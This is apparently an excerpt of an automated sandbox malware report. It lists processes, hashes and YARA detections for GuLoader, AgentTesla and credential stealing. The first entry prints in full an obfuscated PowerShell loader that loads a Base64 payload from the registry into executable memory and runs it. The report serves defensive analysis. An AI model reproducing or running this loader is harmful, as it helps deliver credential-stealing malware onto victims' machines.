                        Commandline:C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skolegaardene = """ReABedSadDi-FiTGeySjpSyeAn De-ChTHeyTepAneLaDReeOpfPriNonMiiPrtSainooScnKa Da'KouRisFoiUdnMygSy SySImyInsOftTreTumok;SuuStsNyiSunBigDr TrSMiyAssDatDeePrmTi.DoRMiuManSotCoiGamDueBi.BoIAnnSotPheOprInoUdpTeSDeeOmrgovStiKncTreDesFo;oppSiuPabFolVaiAfcGl ElsShtFiaBatHviCocOt dacUnlRyaDzsSpsOr SiRChePraUdbStrGiiSidAdgPaeNodAt1Ch In{Cr[FjDDrlAdlSqIHemTapKooBerVatDe(Ne`"""SowOwiHanSamBlmBa.DedSalBalIn`"""Bi)Sg]KopPeuAsbFolUniHocMy PrsGrtUnaSetIniStcSi HaeNexSktBrePorFenGe uniUnnArtMa HomCaiMbdSaiSuOTjuLgtNoOZipFoeJrnXs(SmiOrnButbr PokPrvAbaTalMoiBe,TiiganSatth brKAtovinTe,ZaiLunDitAd KoRRuiOvnPegSaeAtdTh,RriBanTrtDe SpUOunPywFooHe,HoiKnnGetHa koUWidGreRe)Co;as[MuDTulAllReIThmNopBloBrrFitNe(Ud`"""SekUneserObnOmeBilHl3Up2Te`"""He)av]RipAruFubOclFiiCucMa AssEmtSaaDrtApiFrcTu RaeStxDitKieVerMenPr JiiFanOvtLo ArLMooPecviaAulprSUnhCarPoihunSvkde(OuiUnnHitSt ResDycPuoUnrTupGriBr,WhiVenDotSt StNSasFikOveMatImnUp)Eu;Fg[GuDHylAnlFuIPemAfpLeoWirMutRa(Kh`"""VekBieEmrAdnPueanlNl3Ek2bl`"""Sp)Pe]RepGeuRebPrlReiRacSt desBetTaaMatFiiFocOm SheFaxPitDieUnrTanko BliSunKatKe ScSAreCatAnCUdoMomBomSiSDitCaazatAmeRe(UniSmnExtSe CoKCuoBefAltSmaAf,NaiAfnLatSu scSLatKaoHorHorTryBu)sk;Kr[LiDstlImlcuIHomEkpTaoRkrBrtSh(Pu`"""PskFeeSkrAnnOpeunlBi3Sp2ut`"""Va)Gr]GopOruPabOvlUpiShcSu VesBetLaaIstPtiSncEn PueBuxAgtCoeunrCanUe AliMonvetCe TrHLeeSaaSlpJaCDyrSieDiaAftTieDr(IliGrnUdtEn ScNDoeDocWirHioSapBe,BiiVonSitDo GaFSelafsFnkPr,IniInnAntOs moGSirSpuFipLe)Al;Sy[brDUplAblSeIPomSupTeoBarbltGl(Af`"""PrkCoeXerBanFleAflsy3Br2Ma`"""un)Tr]HepNauNobColUliRecUd SrsDetThaRotKuiIscPh GreBexFrtGeeSprMinVi CiiFinwotDe StVFaipsrZotThuMiaOplStAArlUnlAgoGrcbo(DaiSanSytAf EqvEp1Sy,hoiDenOxtSt UnvMe2Be,TriKonKotro SkvFl3wi,FoiMonGatFi StvMi4Ch)Be;Tu[PaDAtlBglOpIKomPhpLaoBarSptWa(Ma`"""ThiJamRemDe3Ba2Vi.HedSolSalBa`"""Fe)Br]SepLuuEnbAflDeiHocSk LusHytViaantKoiPocZr NoeDrxUrtCleFardonBl HeiBanBrtXe hvIBlmRhmAgSkreDetEvSMatFiaRatUduAnsDuWAniRunKedDioOpwTrPBroAnsPu(CoiUnnDitBa NePPoaSklSkaEn,ChiRenXetAl skRPyaInzNe)Me;Bi[VaDRelRhlAnIsemifpOuochrFrtDe(Ti`"""omAHyDwiVreAfaPGrIPh3Sn2Mi.SpDNiLPlLVu`"""Ep)Un]VepCluSsbGelReiAfcFl drsLgtMiaErtPaiOpcna SheSixCytOpeGerBenSu UniStnTitAk BaISnnTriSotMaiScaGrlPaiejzCoeAnAKactalBe(PoiPunHntRu TeCTioAclBa,AaiSynMetMi LeUPinDeaPr,AfiMenRetAs FaFMelFroTepOrpOl2na0Ma1Sn)Mi;In[DeDSalPalslIChmNopEroPhrEutSc(Pa`"""EngSvdTaiOl3Re2so`"""Ud)Qu]FipHyuSkbAdlMaiGucGi OcsUdtlaaMotReiFrcSk IjeWixAxtqueUnrHanBo GeiCinMatSa HuSSeeRatBeWEdiLinBldEnoMewFuEPexNotBrEStxPl(SliSanNvtGe biDDauDacFl,buiTynCetTo UdHToeLanHubHulDy,AniBenOutTi MoSKuiBrdRaecotCaaFo,IsiTinThtUb AfAUlpFrpIsaTosIs)Pa;Uf[AuDTilCalAfIScmBapOmoIkrHetOm(Un`"""MygPrdAliPa3An2Tr`"""Un)Th]RopjouCebMalFliBlcBl AgsLrtPyaBetHjiCocUl TaeVoxFotAfeNorAlnBy CoiAunIttHa NaUTrnNorIgeGeakelNoiVazAneStOSjbEnjSieOpcFrtUn(LeiHjnUntKi RvHNooBiwBeeFraManhe)Su;Sp[CaDDilUdlPlIBemFrpNooEgrDitDe(Ce`"""couDesAgeNurSu3Ke2Ma`"""Fo)fl]DepdiuCibStlOuiSecBi ScsHytBjalitFliDrcBl ToeCoxBytFoeGarRenPo SeitunMetDa UnGMoeprtHaKFoefoyNeSBotMuaGrtFeeSk(BaiVinSttNo SkFFooUnrGe)Di;lo[ByDPelTulMiIMimKapCooInrPutxe(Un`"""RegCydWoiDo3Me2Us`"""St)Be]KopMauHybBolEdiLvcRe SksDatFlaTitdaiChcDr EneMexFetTaeTorWenKl BriErnThtRe LaPAloPelGiySoTBueCrxSetDiOInuBetKo(VeiNanEmtRe UfFFoeSpeSidInsSttSt,YoiPanBltLe ElFOblSpoUrrKieFu,NeiEtnEltPs TrLRaiBemAn)Be;Br[UbDArlMylStIismStpAcoHerLytHe(vl`"""SuuUnsPreAfrhj3Kr2Pr`"""Un)Un]IspPauSrbPalSmicocma FrsretBoaSttBeiancPr OweBoxKotFaeUrrSnnSu FriStnUntma AnESaxUrcTrlliuPrdBrePsUBepTodDoaUntArePoRAugMonBy(DeiKlnHatVa PaUMunAbdPr1Ba3Ti7Le,UniSknAntSk UnKSonUniUnrPo)Ni;Sk[MiDaslEklStIUnmRkptroCarUntEl(Kr`"""TikCueDyrVanBreIdlUn3Bo2Di`"""po)Su]IdpenudrbTmlOpiGrcfl MesMatKhaDotDiiSycAs LaeOvxRetUreGrrUsnst OuivinPetBe KoSAreXatFrCMioAinFlsLooUnlOpeTeMOdoLodGoecr(sciMunsutCh LvCYdrKoaChvVeaUntTa,iniApnlstNs RuSGovgrmKumKr)Th;Pa[ElDDilStlviISamTepKooAfrFotMa(la`"""SikAeeDdrafnToeSnlCa3Ob2Ag`"""St)he]TepInuStbFolPeiPrcan PosphtSyaudtSoiDecBl OueSaxNotNoeBerLanPo TeIVanSatRePPrtLarBl LaEArnSyuTrmnoSReyDesSktRaeKlmBlLPaoTecImaUtlAneDisPeWMe(KauLyiDenOvttn CrvAc1Cu,SjilonAmtOy SavKa2St)Ti;Be}Ti'De;br`$PrRReeSkaEmbRerPhiSvdKogKueUrdYo3Ts=Ba[FyRtieMaaNobSmrHoiLidUdgBieReddr1Id]Co:Af:GlVBriExrMetFouInaImlReAGrllalAkoKocDi(Un0Ud,No1In0Pa4Ef8at5Ca7Ta6ul,Ch1ud2Ha2Ha8Ud8Be,Bo6Ve4Sy)do;Sc`$FeHPaeDraFjdStbEiaOmnaldFosCr=Tv(KvGRoeSjtTu-siIKrtAbeApmSaPParEkoLypsoeChrUdtHeySt Fl-ToPgraPotSnhBi Ge'UnHToKDaCSaUAf:Al\FlAApnCotTaaPrrRi\OvHmiaSlnBadBrlGniKonUdgPrsGo'un)Mi.TiDHjeortOseWokGrtBreAlrCaiPinFygFoeGurEsnAdeKksLo;Un`$BoTRewReihenReeTh Kr=Ls Ov[MeSVeyOpsVetAzeMymAu.OmCThoAgnPivSwelarTotEl]Ne:Vg:ReFserMeoismInBEraTrsDeeAb6Po4SpSRetacrLeiinnDegPa(Ra`$ClHBeeVoaBodUnbBeaPonBedDisLo)Le;Ti[UnSTryOfsPatCleShmRe.SeRReuMinSttFoiAemCueEl.TrITunBhtEveErrProKopTrSNyeRergevLeiPhcKrePhsEd.seMSuaFirunsPrhAaaDelSo]Ej:Pr:WrCReoHypDeyGr(Ho`$AgTRewFoidinTaeSt,Fo Ca0Sc,Wi Th Ca`$EkRCyePoaQubdirPsividOpgRaeDadOs3do,Ku Ga`$MiTMawUniefnBreFo.TrcRvoFiuRanbytSp)Su;Pa[afRFoeJuaRebChrUniPldmngIneSedCo1lo]Tu:Af:NyEIcnBluRemGuSOsyCesPrtDieDimItLProBicToaDalSaeHasTrWDe(Fi`$SoRIneFoaGabEjrKeiPodRegSieTodSa3lu,Is Eg0fe)pi#Vo;""";Function Reabridged4 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Regionplanarbejderne = $Regionplanarbejderne + $HS.Substring($i, 1); } $Regionplanarbejderne;}$Enterprise0 = Reabridged4 'GrITyEDoXLy ';$Enterprise1= Reabridged4 $Skolegaardene;&$Enterprise0 $Enterprise1;;
                        Imagebase:0x12e0000
                        File size:430592 bytes
                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Yara matches:
                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.759722470.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high

                        Target ID:4
                        Start time:11:05:36
                        Start date:28/11/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7fcd70000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:7
                        Start time:11:06:43
                        Start date:28/11/2022
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.cmdline
                        Imagebase:0x1f0000
                        File size:2170976 bytes
                        MD5 hash:350C52F71BDED7B99668585C15D70EEA
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Reputation:moderate

                        Target ID:8
                        Start time:11:06:44
                        Start date:28/11/2022
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA66C.tmp" "c:\Users\user\AppData\Local\Temp\2vgl23kr\CSC2C40FF502EE54A39B5D71CE974C4B10.TMP"
                        Imagebase:0x13d0000
                        File size:43176 bytes
                        MD5 hash:C09985AE74F0882F208D75DE27770DFA
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:10
                        Start time:11:07:38
                        Start date:28/11/2022
                        Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
                        Imagebase:0xf70000
                        File size:106496 bytes
                        MD5 hash:827875A7EE6003FC7F5301C613A2BB1C
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Yara matches:
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000000.627203109.0000000001350000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:moderate

                        No disassembly